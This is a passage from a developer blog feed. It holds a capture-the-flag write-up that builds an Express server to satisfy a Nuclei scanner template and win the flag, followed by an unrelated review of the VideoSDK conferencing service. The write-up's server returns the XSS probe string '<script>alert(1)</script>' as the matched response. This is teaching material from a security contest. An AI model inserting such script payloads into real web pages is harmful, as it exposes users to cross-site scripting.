src="https://res.cloudinary.com/practicaldev/image/fetch/s--576HJcP8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1enhugslc78v1zguciun.png" alt="Page preview" width="705" height="220"></a></p> <p>Here, we can input a valid URL only as it will validate the input. Since there is not much exciting stuff on the website, let's dive into the <a href="https://ctf.tcp1p.com/challenges#A%20simple%20website-311">source code</a> provided.</p> <h2> ⛏ Source digging </h2> <p>In the zip archive, we can find docker-related files, <code>custom-template.yaml</code> file, and also <code>app.py</code> which is a flask application.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--pMPHZLg8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2znhguq6eezg4v31e0yu.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--pMPHZLg8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2znhguq6eezg4v31e0yu.png" alt="dist.zip files" width="298" height="196"></a></p> <p>In the <code>custom-template.yaml</code> file, we can find interesting metadata, and HTTP requests..? We'll get into it further later.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hwLFdPUI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w7bjasvuw9qe675zrm9n.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hwLFdPUI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w7bjasvuw9qe675zrm9n.png" alt="custom-template.yaml" width="800" height="469"></a></p> <p>On the other side, we can find the source code! <code>app.py</code>. Inside, we can find the corresponding file that handles the <code>/submit</code> route. We can also find the validation code for the URL input.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--O7c6v14l--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ciltdprwimdbg9byjmja.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--O7c6v14l--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ciltdprwimdbg9byjmja.png" alt="Validation code snippet" width="800" height="216"></a></p> <p>Following that, we can also find a command snippet that will run a process that uses our <strong>input</strong>, and by getting the desired output, we can get the flag ✨.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--u1k6OjFI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p0ee8twfhz4mq1t7tecq.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--u1k6OjFI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p0ee8twfhz4mq1t7tecq.png" alt="Command snippet" width="800" height="115"></a></p> <h2> βš› Nuclei </h2> <p>By doing a short Google search, <a href="https://docs.nuclei.sh/">Nuclei</a> is:</p> <blockquote> <p>a fast scanner used to scan modern applications, infrastructure, cloud environments, and networks to help you find and remediate vulnerabilities. <a href="https://docs.nuclei.sh/getting-started/overview">(source)</a></p> </blockquote> <p>Now, we also know that <code>custom-template.yaml</code> is for nuclei to use. We can find the templating guide in the official nuclei <a href="https://docs.nuclei.sh/template-guide/introduction">templating guide</a> documentation. From the custom template, URL input, and source code, we can safely assume that we need to craft an HTTP server that fulfills the template requirements.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UnTMBAdf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4ma1umma4s9zikczcfnj.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UnTMBAdf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4ma1umma4s9zikczcfnj.png" alt="Nuclei template introduction" width="800" height="155"></a></p> <h2> πŸ›  Crafting the server </h2> <p>Let's first list the things we need to do.</p> <ol> <li> <p><strong>Routes</strong></p> <p>We need to create 2 endpoints that are written in the template.yaml file:</p> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>- `/api/v1/version` - `/api/v2/echo` ![HTTP endpoints](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s5kz0t3f7z4c9m8uokhd.png) </code></pre> </div> <ol> <li> <p><strong>Response</strong></p> <ol> <li> <p>In the <code>/version</code> endpoint, we need to respond with:</p> <ul> <li> <code>version</code> that needs to be under or equal to <code>10.0.5</code> but later than <code>10.0.1</code> </li> <li>Exact words that matches <code>"NAME":"TCP1P"</code> and <code>"msg":"success"</code> </li> </ul> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--VFPHtGV4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sslz06ag0auzr42ek0wl.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--VFPHtGV4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sslz06ag0auzr42ek0wl.png" alt="First request matcher" width="582" height="231"></a></p> </li> <li> <p>As for the <code>/echo</code> endpoint, we have a more complex requirement:</p> <ul> <li>the body need to match <code>TCP1P{[a-z]}</code> regex,</li> <li>contains the string <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>,</li> <li>and responds with status code 200.</li> </ul> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--AZC2YMCr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gdlm45no7er25tey7x3g.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--AZC2YMCr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gdlm45no7er25tey7x3g.png" alt="Second request matcher" width="549" height="135"></a></p> </li> <li><p>Lastly, every request must respond with code 200.</p></li> </ol> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--WlhgEYaC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8xtxfqpwh3unjlfiwlbe.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--WlhgEYaC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8xtxfqpwh3unjlfiwlbe.png" alt="Status 200" width="164" height="76"></a></p> </li> </ol> <p>Now, we can actually make the server that will definitely give us the flag! For this example, I'll use <a href="https://expressjs.com/">Express</a> and <a href="https://nodejs.org/en">Node</a>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="nx">express</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">express</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span> <span class="nx">app</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/v1/version</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">res</span> <span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="dl">"</span><span class="s2">NAME</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">TCP1P</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">msg</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">success</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">version</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">10.0.4</span><span class="dl">"</span> <span class="p">});</span> <span class="p">});</span> <span class="nx">app</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/v2/echo</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">res</span> <span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">TCP1P{a} &lt;script&gt;alert(1)&lt;/script&gt;</span><span class="dl">"</span><span class="p">);</span> <span class="p">});</span> <span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="mi">3000</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Server listening on port 3000</span><span class="dl">'</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--TOKV8YF6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6jyp0dijvl7vmy0pw5g9.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--TOKV8YF6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6jyp0dijvl7vmy0pw5g9.png" alt="Server running" width="372" height="101"></a></p> <h2> 🩸 Execution </h2> <p>To allow nuclei from the challenge to access our server, we can use a tunnel service like <a href="https://ngrok.com/">ngrok</a> to give us a public URL.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--h67FTsCw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/46h1fhtjvjfqn37q3oet.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--h67FTsCw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/46h1fhtjvjfqn37q3oet.png" alt="ngrok" width="800" height="300"></a></p> <p>Just like that, submitting the URL... and we got the flag ✨!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--CWsbcPVj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kynfyqsyn70nwd376twl.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--CWsbcPVj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kynfyqsyn70nwd376twl.png" alt="Flag!!" width="548" height="66"></a></p> <p><em>Feedback are appreciated!</em></p> tcp1pctf2023 misc Multimedia Conferencing with VideoSDK Edqe14 Mon, 06 Mar 2023 04:08:55 +0000 https://forem.com/edqe14/multimedia-conferencing-with-videosdk-214n https://forem.com/edqe14/multimedia-conferencing-with-videosdk-214n <p>You probably don't need to "make-your-own" video conferencing app, but if you do, then let me tell you about a SaaS platform I've been using for a school project.</p> <p><a href="https://videosdk.live"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--CrBKOtgG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tgnb1x5kdkg3slxvplm9.png" alt="VideoSDK Homepage" width="800" height="405"></a></p> <p>With VideoSDK, you don't need to worry about making a WebRTC server, managing client connections, managing your server deployment, etc., etc. It's just simply, plug-and-play.</p> <p>You can make a lot with VideoSDK but for this article, I'll only cover some main features that I've used for my project personally and my overall experience working with it.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ovb-h4XN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mdq6wg1pcwuzybntfyii.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ovb-h4XN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mdq6wg1pcwuzybntfyii.png" alt="Features" width="800" height="560"></a></p> <h2> πŸ’° Pricing </h2> <p>Starting with the pricing, I could say, it's really good for a small SaaS company. It offers 10,000 minutes per month for free, then continues as pay-as-you-go for every conferencing minute taken.</p> <p>For basically no limits with the free tier, it's great for a beginner project that requires basic real-time media connectivity, compared to other competitors, for example, Twillio. <strong>I'd say, it's worth the price.</strong></p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--PFos4atf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/UbGii9oGosoAAAAC/money-wallet.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--PFos4atf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/UbGii9oGosoAAAAC/money-wallet.gif" alt="I'm broke too" width="208" height="208"></a></p> <h2> ✨ Quality </h2> <p>Video quality by default is a bit blurry at the start but you can change the quality in the provided SDK. As for developer experience, there is still room for improvement and fixes.</p> <p>For example, there's mistyping with the Javascript (Typescript typing) SDK, not the best documentation but enough to get you up and running, etc.</p> <p>If you ever run into problems, the VideoSDK Discord is a great place to get help, since the core team is actively interacting with users' problems and requests. <strong>Overall, great stuff</strong>!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ix137LoA--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/JHZWHc6hZgoAAAAC/thumbs-up-kid.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ix137LoA--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/JHZWHc6hZgoAAAAC/thumbs-up-kid.gif" alt="Pretty cool!" width="320" height="240"></a></p> <blockquote> <p>Now, let's get into the technical bits πŸ”§</p> </blockquote> <h2> πŸ“š Documentation </h2> <p>Like before, the documentation is not the best but could get you up and running in no time. There are some improvements that I can think about:</p> <p><strong>1. Grouping by language</strong></p> <p>Instead of separating guide and API reference, then separating between prebuilt &amp; custom SDK again, which could be confusing at first.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--c_Hx4Ukp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jfnmziwdt0sbsol6e36j.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--c_Hx4Ukp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jfnmziwdt0sbsol6e36j.png" alt="Docs page" width="800" height="405"></a></p> <p>Instead, I think it would be better to group everything on a page. Inside the page, you can pick your desired language and it will show everything related to that language, including prebuilt &amp; custom SDK, API reference, etc.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--wIgGEBPa--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/963bws03otcact625dxh.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--wIgGEBPa--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/963bws03otcact625dxh.png" alt="Sidebar Manu" width="298" height="475"></a></p> <p><strong>2. Better guide</strong></p> <p>I don't see the guide as really useful compared to the API reference. So, I think there is still a lot of room for improvement here.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--eD2Gr-0T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mf6s1mbimzq80vakm52j.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--eD2Gr-0T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mf6s1mbimzq80vakm52j.png" alt="Guide page" width="800" height="405"></a></p> <p>Overall, pretty good documentation but definitely could use more refining.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--6axrWzVC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/_-a-X7FMC2oAAAAC/could-be-better-dr-adrian-mallory.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--6axrWzVC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/_-a-X7FMC2oAAAAC/could-be-better-dr-adrian-mallory.gif" alt="Could be better" width="498" height="224"></a></p> <h2> 🧠 Code SDK </h2> <p>VideoSDK is packed with various SDKs for various languages. It supports web and mobile framework languages like Javascript for the web, Java for Android, Swift for IOS, and Dart for Flutter.</p> <p>As I've stated above, there are still some minor bugs in the client SDK but it is actively being handled by the core team at VideoSDK to fix the issue.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--wrE9vIv_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q7perykjxjohm042b6so.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--wrE9vIv_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q7perykjxjohm042b6so.png" alt="SDK variations" width="202" height="305"></a></p> <p>Overall, the SDK is pretty great. Maybe sometimes you will stumble into some minor bugs, then you can join the <a href="https://discord.gg/videosdk-live-876774498798551130">VideoSDK Discord</a> and report your findings there! I'm sure the VideoSDK team is happy to assist you.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1KFr411v--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/HqNWYODr1XUAAAAM/nod-nodding.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1KFr411v--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/HqNWYODr1XUAAAAM/nod-nodding.gif" alt="Not bad" width="220" height="123"></a></p> <h2> 🀨 Conclusion </h2> <p>Overall, VideoSDK is a great SaaS platform to power your project. It might not be suitable for a big project where you need more control over your infrastructure. Personally, I'm happy with VideoSDK right now for my project as it covers what I need to solve and handles all the heavy lifting.</p> <p>I hope you find this article useful and informative. Since this is my first time writing an article, feedback are appeciated! Happy coding everyone~ πŸš€</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--4YLHImhR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/3nKnLBtsMtcAAAAM/coding-code.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--4YLHImhR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://media.tenor.com/3nKnLBtsMtcAAAAM/coding-code.gif" alt="Coding be like" width="220" height="393"></a></p> <p><em>Images used came from <strong>Unsplash</strong>, <strong>Tenor</strong>, and <strong>VideoSDK's website</strong></em></p> webdev typescript react programming